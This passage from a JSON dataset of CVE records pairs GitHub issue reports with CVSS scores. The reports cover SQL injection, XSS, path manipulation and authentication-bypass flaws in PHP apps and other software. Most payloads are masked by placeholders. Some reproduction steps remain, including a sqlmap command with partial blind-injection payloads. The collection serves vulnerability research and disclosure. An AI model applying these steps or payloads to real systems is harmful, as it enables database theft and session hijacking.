  73160. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73161. "severity": "CRITICAL",
  73162. "baseScore": 9.8,
  73163. "impactScore": 5.9,
  73164. "exploitabilityScore": 3.9
  73165. },
  73166. {
  73167. "CVE_ID": "CVE-2021-43630",
  73168. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/4",
  73169. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/4",
  73170. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  73171. "Issue_Created_At": "2021-11-08T13:16:26Z",
  73172. "description": "SQL Injection vulnerability via multiple parameters in FILETAG . Author APITAG ( APITAG Version NUMBERTAG ulnerable parameters apfullname apphone_no apaddress APITAG APITAG Steps to reproduce NUMBERTAG Login to your patient account NUMBERTAG On the next patient page, enter personal information into the form NUMBERTAG Click on the Submit button NUMBERTAG Intercept the request and insert the payload in the value of parameters NUMBERTAG Forward the request Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG FILETAG FILETAG FILETAG Remediation Validate input of all vulnerable parameters in APITAG .",
  73173. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  73174. "severity": "HIGH",
  73175. "baseScore": 8.8,
  73176. "impactScore": 5.9,
  73177. "exploitabilityScore": 2.8
  73178. },
  73179. {
  73180. "CVE_ID": "CVE-2021-43631",
  73181. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/5",
  73182. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/5",
  73183. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  73184. "Issue_Created_At": "2021-11-08T14:00:14Z",
  73185. "description": "SQL Injection vulnerability via \"appointment_no\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Steps to reproduce NUMBERTAG Go to Staff Login page NUMBERTAG Login with User Type = Clerk NUMBERTAG In the All Appointments page, click on a record in the list NUMBERTAG Intercept the request and insert the payload in the value of the APITAG parameter NUMBERTAG Forward the request Example payloads: Boolean based ERRORTAG Time based APITAG UNION based ERRORTAG Proof of concept ERRORTAG Response in Burpsuite Time based FILETAG UNION based FILETAG Source code review FILETAG FILETAG FILETAG FILETAG Remediation Validate input of the APITAG parameter in APITAG .",
  73186. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73187. "severity": "CRITICAL",
  73188. "baseScore": 9.8,
  73189. "impactScore": 5.9,
  73190. "exploitabilityScore": 3.9
  73191. },
  73192. {
  73193. "CVE_ID": "CVE-2021-43635",
  73194. "Issue_Url_old": "https://github.com/jcv8000/Codex/issues/8",
  73195. "Issue_Url_new": "https://github.com/jcv8000/codex/issues/8",
  73196. "Repo_new": "jcv8000/codex",
  73197. "Issue_Created_At": "2021-09-10T09:06:09Z",
  73198. "description": "Code Execution vulnerability on Codex. Issue Cross site scripting(XSS) on Codex APITAG name lead to code execution. Reproduction NUMBERTAG Open Code NUMBERTAG Create new Notebook NUMBERTAG Insert payload on the Notebook(or page) name field On Mac APITAG test APITAG On Windows APITAG test APITAG NUMBERTAG Once you move your mouse over the link \"test\" , Calculator will be opened. APITAG Mitigation Disable APITAG",
  73199. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73200. "severity": "MEDIUM",
  73201. "baseScore": 6.1,
  73202. "impactScore": 2.7,
  73203. "exploitabilityScore": 2.8
  73204. },
  73205. {
  73206. "CVE_ID": "CVE-2021-43659",
  73207. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1522",
  73208. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1522",
  73209. "Repo_new": "halo-dev/halo",
  73210. "Issue_Created_At": "2021-11-09T07:20:53Z",
  73211. "description": "Arbitrary file upload in the backend could cause a stored XSS vulnerability.. What is version of Halo has the issue NUMBERTAG What database are you using? Other What is your deployment method? Fat Jar Your site address. _No response_ What happened? At the function point of uploading the avatar, any file can be uploaded, such as uploading an HTML file, which will cause a stored XSS vulnerability. the file upload function points. APITAG upload HTML file, show success. APITAG access the HTML file, you can see that it is parsed by the browser. APITAG If you upload malicious XSS code, you will get the user's token, like this Payload CODETAG FILETAG APITAG Analyzing the code, it can be seen that all suffixes can be uploaded, and there is no restriction on the suffix name of the file APITAG Its recommended to only allow the parameter extension to be FILETAG or other image suffixes APITAG Relevant log output _No response_ Additional information _No response_",
  73212. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  73213. "severity": "MEDIUM",
  73214. "baseScore": 5.4,
  73215. "impactScore": 2.7,
  73216. "exploitabilityScore": 2.3
  73217. },
  73218. {
  73219. "CVE_ID": "CVE-2021-43666",
  73220. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/5136",
  73221. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/5136",
  73222. "Repo_new": "mbed-tls/mbedtls",
  73223. "Issue_Created_At": "2021-11-08T06:19:02Z",
  73224. "description": "APITAG can't exit when the input password length is NUMBERTAG Summary I am using APITAG The testfile is as follows: CODETAG The program keeps running that cannot exit. Neither result nor error is given. Expected behavior Exit with a result, or an error code if not supported. Actual behavior The function does not exit.",
  73225. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  73226. "severity": "HIGH",
  73227. "baseScore": 7.5,
  73228. "impactScore": 3.6,
  73229. "exploitabilityScore": 3.9
  73230. },
  73231. {
  73232. "CVE_ID": "CVE-2021-43668",
  73233. "Issue_Url_old": "https://github.com/ethereum/go-ethereum/issues/23866",
  73234. "Issue_Url_new": "https://github.com/ethereum/go-ethereum/issues/23866",
  73235. "Repo_new": "ethereum/go-ethereum",
  73236. "Issue_Created_At": "2021-11-08T06:39:09Z",
  73237. "description": "Nodes crash down after receiving a serial of messages generated by fuzzer, and cannot be recovered. System information Geth version: ERRORTAG OS & Version: APITAG Network: Private test net Expected behaviour Node sync block in the private net. Actual behaviour Node crashed down with \"runtime error: invalid memory address or nil pointer dereference\" Steps to reproduce the behaviour NUMBERTAG setup a NUMBERTAG node private geth nodes lcoally NUMBERTAG setup a fuzzing node continually sending fuzzed messages to other NUMBERTAG normal geth nodes NUMBERTAG After more than NUMBERTAG hours fuzzing experiment, one of the geth node who is run in fast mode crashed down. The running command for the node is CODETAG ERRORTAG When submitting logs: please submit them as text and not screenshots.",
  73238. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  73239. "severity": "MEDIUM",
  73240. "baseScore": 5.5,
  73241. "impactScore": 3.6,
  73242. "exploitabilityScore": 1.8
  73243. },
  73244. {
  73245. "CVE_ID": "CVE-2021-43668",
  73246. "Issue_Url_old": "https://github.com/syndtr/goleveldb/issues/373",
  73247. "Issue_Url_new": "https://github.com/syndtr/goleveldb/issues/373",
  73248. "Repo_new": "syndtr/goleveldb",
  73249. "Issue_Created_At": "2021-09-23T05:55:20Z",
  73250. "description": "Nil pointer in leveldb. Hi, recently we received an issue report in Go ethereum project, it's a leveldb relevant panic because of nil pointer. The version we used is APITAG The original stack trace can be found here. ERRORTAG",
  73251. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  73252. "severity": "MEDIUM",
  73253. "baseScore": 5.5,
  73254. "impactScore": 3.6,
  73255. "exploitabilityScore": 1.8
  73256. },
  73257. {
  73258. "CVE_ID": "CVE-2021-43673",
  73259. "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/188",
  73260. "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/188",
  73261. "Repo_new": "zyx0814/dzzoffice",
  73262. "Issue_Created_At": "2021-05-14T19:23:58Z",
  73263. "description": "Possible XSS vulnerability . Hello, I would to report for a possible XSS vulnerability. In file APITAG ERRORTAG",
  73264. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73265. "severity": "MEDIUM",
  73266. "baseScore": 6.1,
  73267. "impactScore": 2.7,
  73268. "exploitabilityScore": 2.8
  73269. },
  73270. {
  73271. "CVE_ID": "CVE-2021-43674",
  73272. "Issue_Url_old": "https://github.com/ThinkUpLLC/ThinkUp/issues/2289",
  73273. "Issue_Url_new": "https://github.com/thinkupllc/thinkup/issues/2289",
  73274. "Repo_new": "thinkupllc/thinkup",
  73275. "Issue_Created_At": "2021-11-10T12:15:33Z",
  73276. "description": "Possible Path manipulation vulnerability. Hello, I would like to report for path manipulation vulnerability. The path of the vulnrability: File APITAG line NUMBERTAG ERRORTAG File APITAG cache APITAG ERRORTAG File APITAG ERRORTAG File APITAG CODETAG",
  73277. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73278. "severity": "CRITICAL",
  73279. "baseScore": 9.8,
  73280. "impactScore": 5.9,
  73281. "exploitabilityScore": 3.9
  73282. },
  73283. {
  73284. "CVE_ID": "CVE-2021-43676",
  73285. "Issue_Url_old": "https://github.com/matyhtf/framework/issues/206",
  73286. "Issue_Url_new": "https://github.com/matyhtf/framework/issues/206",
  73287. "Repo_new": "matyhtf/framework",
  73288. "Issue_Created_At": "2021-05-13T17:58:26Z",
  73289. "description": "Possible path manipulation vulnerability. Hello, I would like to report for a path manipulation vulnerability. File FILETAG line NUMBERTAG ERRORTAG File FILETAG ERRORTAG File FILETAG ERRORTAG File FILETAG ERRORTAG",
  73290. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73291. "severity": "CRITICAL",
  73292. "baseScore": 9.8,
  73293. "impactScore": 5.9,
  73294. "exploitabilityScore": 3.9
  73295. },
  73296. {
  73297. "CVE_ID": "CVE-2021-43678",
  73298. "Issue_Url_old": "https://github.com/gaoming13/wechat-php-sdk/issues/30",
  73299. "Issue_Url_new": "https://github.com/gaoming13/wechat-php-sdk/issues/30",
  73300. "Repo_new": "gaoming13/wechat-php-sdk",
  73301. "Issue_Created_At": "2021-11-11T13:57:38Z",
  73302. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. Vulnerability path File FILETAG Line NUMBERTAG ERRORTAG Line NUMBERTAG ERRORTAG Line NUMBERTAG ERRORTAG",
  73303. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73304. "severity": "MEDIUM",
  73305. "baseScore": 6.1,
  73306. "impactScore": 2.7,
  73307. "exploitabilityScore": 2.8
  73308. },
  73309. {
  73310. "CVE_ID": "CVE-2021-43679",
  73311. "Issue_Url_old": "https://github.com/shopex/ecshop/issues/4",
  73312. "Issue_Url_new": "https://github.com/shopex/ecshop/issues/4",
  73313. "Repo_new": "shopex/ecshop",
  73314. "Issue_Created_At": "2021-11-11T15:27:51Z",
  73315. "description": "Possible SQL injection vulnerability. Hello, I would like to report for SQLI vulnerability. Vulnerability path File PATHTAG APITAG File PATHTAG ERRORTAG File PATHTAG ERRORTAG File PATHTAG ERRORTAG",
  73316. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73317. "severity": "CRITICAL",
  73318. "baseScore": 9.8,
  73319. "impactScore": 5.9,
  73320. "exploitabilityScore": 3.9
  73321. },
  73322. {
  73323. "CVE_ID": "CVE-2021-43681",
  73324. "Issue_Url_old": "https://github.com/ZeroDream-CN/SakuraPanel/issues/23",
  73325. "Issue_Url_new": "https://github.com/zerodream-cn/sakurapanel/issues/23",
  73326. "Repo_new": "zerodream-cn/sakurapanel",
  73327. "Issue_Created_At": "2021-11-11T16:17:30Z",
  73328. "description": "Possible XSS vulnerability . Hello, I would like to report for XSS vulnerability. In file FILETAG line NUMBERTAG APITAG In function APITAG ERRORTAG line NUMBERTAG APITAG exit will terminate the script and print the message which have the value $data['proxy_name']. Then there is XSS vulnerability",
  73329. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73330. "severity": "MEDIUM",
  73331. "baseScore": 6.1,
  73332. "impactScore": 2.7,
  73333. "exploitabilityScore": 2.8
  73334. },
  73335. {
  73336. "CVE_ID": "CVE-2021-43682",
  73337. "Issue_Url_old": "https://github.com/baijunyao/thinkphp-bjyblog/issues/6",
  73338. "Issue_Url_new": "https://github.com/baijunyao/thinkphp-bjyblog/issues/6",
  73339. "Repo_new": "baijunyao/thinkphp-bjyblog",
  73340. "Issue_Created_At": "2021-11-11T16:39:45Z",
  73341. "description": "Possible XSS vulnerability. Hello, I would like to report XSS vulnerability. In file FILETAG line NUMBERTAG APITAG In file FILETAG line NUMBERTAG function U APITAG function U APITAG function redirect CODETAG exit function will terminate the script and print the message to the user which has $_SERVER['HTTP_HOST']. Then there is XSS vulnerability.",
  73342. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73343. "severity": "MEDIUM",
  73344. "baseScore": 6.1,
  73345. "impactScore": 2.7,
  73346. "exploitabilityScore": 2.8
  73347. },
  73348. {
  73349. "CVE_ID": "CVE-2021-43683",
  73350. "Issue_Url_old": "https://github.com/HaschekSolutions/pictshare/issues/133",
  73351. "Issue_Url_new": "https://github.com/hascheksolutions/pictshare/issues/133",
  73352. "Repo_new": "hascheksolutions/pictshare",
  73353. "Issue_Created_At": "2021-11-11T17:03:54Z",
  73354. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. in FILETAG function APITAG ERRORTAG line NUMBERTAG CODETAG exit function will terminate the script and print the message which has $_REQUEST['hash']. Then there is XSS vulnerability.",
  73355. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73356. "severity": "MEDIUM",
  73357. "baseScore": 6.1,
  73358. "impactScore": 2.7,
  73359. "exploitabilityScore": 2.8
  73360. },
  73361. {
  73362. "CVE_ID": "CVE-2021-43685",
  73363. "Issue_Url_old": "https://github.com/LibreTime/libretime/issues/1437",
  73364. "Issue_Url_new": "https://github.com/libretime/libretime/issues/1760",
  73365. "Repo_new": "libretime/libretime",
  73366. "Issue_Created_At": "2021-11-11T18:10:07Z",
  73367. "description": "Possible path manipulation vulnerability. Hello, I would like to report for path manipulation vulnerability. The path of the vulnerability. In file FILETAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG In file FILETAG line NUMBERTAG ERRORTAG In file FILETAG line NUMBERTAG APITAG line NUMBERTAG ERRORTAG",
  73368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73369. "severity": "CRITICAL",
  73370. "baseScore": 9.8,
  73371. "impactScore": 5.9,
  73372. "exploitabilityScore": 3.9
  73373. },
  73374. {
  73375. "CVE_ID": "CVE-2021-43686",
  73376. "Issue_Url_old": "https://github.com/nZEDb/nZEDb/issues/2659",
  73377. "Issue_Url_new": "https://github.com/nzedb/nzedb/issues/2659",
  73378. "Repo_new": "nzedb/nzedb",
  73379. "Issue_Created_At": "2021-11-12T15:10:52Z",
  73380. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. The path of the vulnerability file PATHTAG line NUMBERTAG ERRORTAG file PATHTAG in line NUMBERTAG ERRORTAG exit function will terminate the script and print the message which has the input $_GET['t']. Then there is XSS vulnerability.",
  73381. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73382. "severity": "MEDIUM",
  73383. "baseScore": 6.1,
  73384. "impactScore": 2.7,
  73385. "exploitabilityScore": 2.8
  73386. },
  73387. {
  73388. "CVE_ID": "CVE-2021-43689",
  73389. "Issue_Url_old": "https://github.com/yicenburan/manage/issues/2",
  73390. "Issue_Url_new": "https://github.com/yicenburan/manage/issues/2",
  73391. "Repo_new": "yicenburan/manage",
  73392. "Issue_Created_At": "2021-11-12T21:31:27Z",
  73393. "description": "Possible XSS vilnerability. Hello, I would like to report to XSS vulnerability. The path of the vulnerability. In file PATHTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG In file PATHTAG line NUMBERTAG ERRORTAG exit function will terminate the script and print a message to the user. Then there is XSS vulnerability because it contains values from $_POST.",
  73394. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73395. "severity": "MEDIUM",
  73396. "baseScore": 6.1,
  73397. "impactScore": 2.7,
  73398. "exploitabilityScore": 2.8
  73399. },
  73400. {
  73401. "CVE_ID": "CVE-2021-43690",
  73402. "Issue_Url_old": "https://github.com/Yurunsoft/YurunProxy/issues/3",
  73403. "Issue_Url_new": "https://github.com/yurunsoft/yurunproxy/issues/3",
  73404. "Repo_new": "yurunsoft/yurunproxy",
  73405. "Issue_Created_At": "2021-11-13T17:22:16Z",
  73406. "description": "Possible XSS vulnerability. Hello, I would like to report to XSS vulnerability. The path. In file FILETAG line NUMBERTAG CODETAG In file FILETAG line NUMBERTAG ERRORTAG In file FILETAG line NUMBERTAG ERRORTAG Exit function will terminate the script and print a message which have values from the socket_read. Which will lead to XSS vulnerability.",
  73407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73408. "severity": "MEDIUM",
  73409. "baseScore": 6.1,
  73410. "impactScore": 2.7,
  73411. "exploitabilityScore": 2.8
  73412. },
  73413. {
  73414. "CVE_ID": "CVE-2021-43691",
  73415. "Issue_Url_old": "https://github.com/toocool/tripexpress/issues/40",
  73416. "Issue_Url_new": "https://github.com/toocool/tripexpress/issues/40",
  73417. "Repo_new": "toocool/tripexpress",
  73418. "Issue_Created_At": "2021-11-13T17:44:22Z",
  73419. "description": "Possible path manipulation vulnerability. Hello, I would like to report for path manipulation vulnerability. The path of the vulnerability. In file PATHTAG APITAG line NUMBERTAG ERRORTAG The variable src is coming from $_SERVER[\"argv\"]. Then there is path manipulation vulnerability.",
  73420. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73421. "severity": "CRITICAL",
  73422. "baseScore": 9.8,
  73423. "impactScore": 5.9,
  73424. "exploitabilityScore": 3.9
  73425. },
  73426. {
  73427. "CVE_ID": "CVE-2021-43692",
  73428. "Issue_Url_old": "https://github.com/zxq2233/youtube-php-mirroring/issues/3",
  73429. "Issue_Url_new": "https://github.com/zxq2233/youtube-php-mirroring/issues/3",
  73430. "Repo_new": "zxq2233/youtube-php-mirroring",
  73431. "Issue_Created_At": "2021-11-13T18:06:33Z",
  73432. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. The path of the vulnerability: In file FILETAG ERRORTAG In file PATHTAG line NUMBERTAG ERRORTAG In file PATHTAG line NUMBERTAG ERRORTAG",
  73433. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73434. "severity": "MEDIUM",
  73435. "baseScore": 6.1,
  73436. "impactScore": 2.7,
  73437. "exploitabilityScore": 2.8
  73438. },
  73439. {
  73440. "CVE_ID": "CVE-2021-43693",
  73441. "Issue_Url_old": "https://github.com/serghey-rodin/vesta/issues/2052",
  73442. "Issue_Url_new": "https://github.com/serghey-rodin/vesta/issues/2052",
  73443. "Repo_new": "serghey-rodin/vesta",
  73444. "Issue_Created_At": "2021-05-14T23:15:25Z",
  73445. "description": "Possible file inclusion vulnerability. Hello, I would like to report for possible file inclusion vulnerability. In file PATHTAG APITAG File PATHTAG ERRORTAG",
  73446. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73447. "severity": "CRITICAL",
  73448. "baseScore": 9.8,
  73449. "impactScore": 5.9,
  73450. "exploitabilityScore": 3.9
  73451. },
  73452. {
  73453. "CVE_ID": "CVE-2021-43695",
  73454. "Issue_Url_old": "https://github.com/IssabelFoundation/issabelPBX/issues/33",
  73455. "Issue_Url_new": "https://github.com/issabelfoundation/issabelpbx/issues/33",
  73456. "Repo_new": "issabelfoundation/issabelpbx",
  73457. "Issue_Created_At": "2021-11-14T17:09:49Z",
  73458. "description": "Possible XSS vilnerability. Hello, I would like to report for XSS vulnerability. The path of the vulnerability: In file FILETAG APITAG In file FILETAG FILETAG ERRORTAG $msg carry the value from $_REQUEST without sanitization. Then there is XSS vulnerability.",
  73459. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73460. "severity": "MEDIUM",
  73461. "baseScore": 6.1,
  73462. "impactScore": 2.7,
  73463. "exploitabilityScore": 2.8
  73464. },
  73465. {
  73466. "CVE_ID": "CVE-2021-43696",
  73467. "Issue_Url_old": "https://github.com/happyman/twmap/issues/57",
  73468. "Issue_Url_new": "https://github.com/happyman/twmap/issues/57",
  73469. "Repo_new": "happyman/twmap",
  73470. "Issue_Created_At": "2021-11-14T23:34:42Z",
  73471. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file line NUMBERTAG APITAG exit function will terminate the script and print a message which has $_REQUEST. Then there is XSS vulnerability",
  73472. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73473. "severity": "MEDIUM",
  73474. "baseScore": 6.1,
  73475. "impactScore": 2.7,
  73476. "exploitabilityScore": 2.8
  73477. },
  73478. {
  73479. "CVE_ID": "CVE-2021-43697",
  73480. "Issue_Url_old": "https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1",
  73481. "Issue_Url_new": "https://github.com/happyliu2014/workerman-thinkphp-redis/issues/1",
  73482. "Repo_new": "happyliu2014/workerman-thinkphp-redis",
  73483. "Issue_Created_At": "2021-11-14T23:42:27Z",
  73484. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file FILETAG line NUMBERTAG CODETAG exit function will terminate the script and print a message which has APITAG Then there is XSS vulnerability.",
  73485. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73486. "severity": "MEDIUM",
  73487. "baseScore": 6.1,
  73488. "impactScore": 2.7,
  73489. "exploitabilityScore": 2.8
  73490. },
  73491. {
  73492. "CVE_ID": "CVE-2021-43698",
  73493. "Issue_Url_old": "https://github.com/sparc/phpWhois.org/issues/21",
  73494. "Issue_Url_new": "https://github.com/sparc/phpwhois.org/issues/21",
  73495. "Repo_new": "sparc/phpwhois.org",
  73496. "Issue_Created_At": "2021-11-15T00:27:17Z",
  73497. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file FILETAG CODETAG exit function will terminate the script and print the message to the user. The message will contain $_GET['query'] then there is XSS vulnerability.",
  73498. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73499. "severity": "MEDIUM",
  73500. "baseScore": 6.1,
  73501. "impactScore": 2.7,
  73502. "exploitabilityScore": 2.8
  73503. },
  73504. {
  73505. "CVE_ID": "CVE-2021-43700",
  73506. "Issue_Url_old": "https://github.com/gongwalker/ApiManager/issues/26",
  73507. "Issue_Url_new": "https://github.com/gongwalker/apimanager/issues/26",
  73508. "Repo_new": "gongwalker/apimanager",
  73509. "Issue_Created_At": "2021-11-10T13:32:12Z",
  73510. "description": "APITAG NUMBERTAG sql injection. poc : python3 sqlmap.py u \" URLTAG \" sqlmap identified the following injection point(s) with a total of HTTP(s) requests: Parameter: tag (GET) Type: boolean based blind Title: AND boolean based blind WHERE or HAVING clause Payload: act=api&tag NUMBERTAG AND NUMBERTAG AND APITAG Type: time based blind Title: APITAG NUMBERTAG AND time based blind (query SLEEP) Payload: act=api&tag NUMBERTAG AND (SELECT NUMBERTAG FROM APITAG AND APITAG",
  73511. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73512. "severity": "CRITICAL",
  73513. "baseScore": 9.8,
  73514. "impactScore": 5.9,
  73515. "exploitabilityScore": 3.9
  73516. },
  73517. {
  73518. "CVE_ID": "CVE-2021-43701",
  73519. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/31",
  73520. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/31",
  73521. "Repo_new": "cskaza/cszcms",
  73522. "Issue_Created_At": "2021-04-14T11:09:30Z",
  73523. "description": "Bug Report: Blind SQL Injection Vulnerability. Description: I found Blind SQL Injection vulnerability in your CMS APITAG \"export\" page. It refers to an injection attack where an attacker can execute malicious SQL statements that control a web application's database server. CMS Version NUMBERTAG Affected URL: URLTAG Steps to Reproduce NUMBERTAG At first login your panel NUMBERTAG then go to APITAG Menu > CSV Export / Import NUMBERTAG then select any Table Name and Select Fields. so your request data will be GET PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Waterfo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG PATHTAG mw back to live edit=true; show sidebar layouts NUMBERTAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG FILETAG FILETAG Proof of Concept: You can see the Proof of Concept. which I've attached a video to confirm the vulnerability. FILETAG Impact: An attacker could extract information from database. Let me know if any further info is required. Thanks & Regards Rahad Chowdhury Cyber Security Specialist APITAG Limited URLTAG",
  73524. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  73525. "severity": "MEDIUM",
  73526. "baseScore": 6.5,
  73527. "impactScore": 3.6,
  73528. "exploitabilityScore": 2.8
  73529. },
  73530. {
  73531. "CVE_ID": "CVE-2021-43703",
  73532. "Issue_Url_old": "https://github.com/forget-code/zzcms/issues/1",
  73533. "Issue_Url_new": "https://github.com/forget-code/zzcms/issues/1",
  73534. "Repo_new": "forget-code/zzcms",
  73535. "Issue_Created_At": "2021-11-11T03:47:58Z",
  73536. "description": "By disabling APITAG to bypass administrator authentication restrictions. The administrator authentication code in FILETAG is as follows FILETAG FILETAG is the web application administrator authentication page. When the identity authentication fails, it will jump to the login page. There is a problem with the jump code on line NUMBERTAG of FILETAG . The page is redirected through APITAG but the program execution is not stopped immediately after the jump. So after disabling APITAG you can directly access the administrator console.",
  73537. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73538. "severity": "CRITICAL",
  73539. "baseScore": 9.8,
  73540. "impactScore": 5.9,
  73541. "exploitabilityScore": 3.9
  73542. },
  73543. {
  73544. "CVE_ID": "CVE-2021-43707",
  73545. "Issue_Url_old": "https://github.com/maccmspro/maccms10/issues/18",
  73546. "Issue_Url_new": "https://github.com/maccmspro/maccms10/issues/18",
  73547. "Repo_new": "maccmspro/maccms10",
  73548. "Issue_Created_At": "2021-11-11T10:26:51Z",
  73549. "description": "XSS. \u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u57fa\u7840 >\u53cb\u94fe\u7ba1\u7406 >\u6dfb\u52a0\uff0c\u5728\u540d\u79f0\u5904link_name FILETAG APITAG FILETAG",
  73550. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73551. "severity": "MEDIUM",
  73552. "baseScore": 6.1,
  73553. "impactScore": 2.7,
  73554. "exploitabilityScore": 2.8
  73555. },
  73556. {
  73557. "CVE_ID": "CVE-2021-43721",
  73558. "Issue_Url_old": "https://github.com/leanote/desktop-app/issues/364",
  73559. "Issue_Url_new": "https://github.com/leanote/desktop-app/issues/364",
  73560. "Repo_new": "leanote/desktop-app",
  73561. "Issue_Created_At": "2021-11-12T09:17:28Z",
  73562. "description": "Markdown type note XSS issue. i found a xss problem in the markdown type note you can verify the XSS with payload: APITAG and This leads to remote code execution with payload : APITAG the test version is NUMBERTAG",
  73563. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73564. "severity": "MEDIUM",
  73565. "baseScore": 6.1,
  73566. "impactScore": 2.7,
  73567. "exploitabilityScore": 2.8
  73568. },
  73569. {
  73570. "CVE_ID": "CVE-2021-43724",
  73571. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/890",
  73572. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/890",
  73573. "Repo_new": "intelliants/subrion",
  73574. "Issue_Created_At": "2021-11-08T16:01:45Z",
  73575. "description": "this is Cross Site Scripting (XSS). I have found Cross Site Scripting (XSS) bug in subrion CMS version NUMBERTAG in the Create Page functionality of the admin Account. Steps to Reproduce: just login as admin and click this url URLTAG As an admin Create test page In the Add a Page section go to the Page Content then click \u201cimage\u201d choose local file NUMBERTAG svg to upload in url : URLTAG the content of APITAG APITAG APITAG APITAG FILETAG and then double click NUMBERTAG svg we can get a url as FILETAG FILETAG open the url FILETAG Xss prompt box will pop up FILETAG Impact: Session cookies can be stolen , user can be redirected to phishing pages , browser of the user visiting this page can be controlled etc. POC's have been uploaded. FILETAG",
  73576. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  73577. "severity": "MEDIUM",
  73578. "baseScore": 4.8,
  73579. "impactScore": 2.7,
  73580. "exploitabilityScore": 1.7
  73581. },
  73582. {
  73583. "CVE_ID": "CVE-2021-43734",
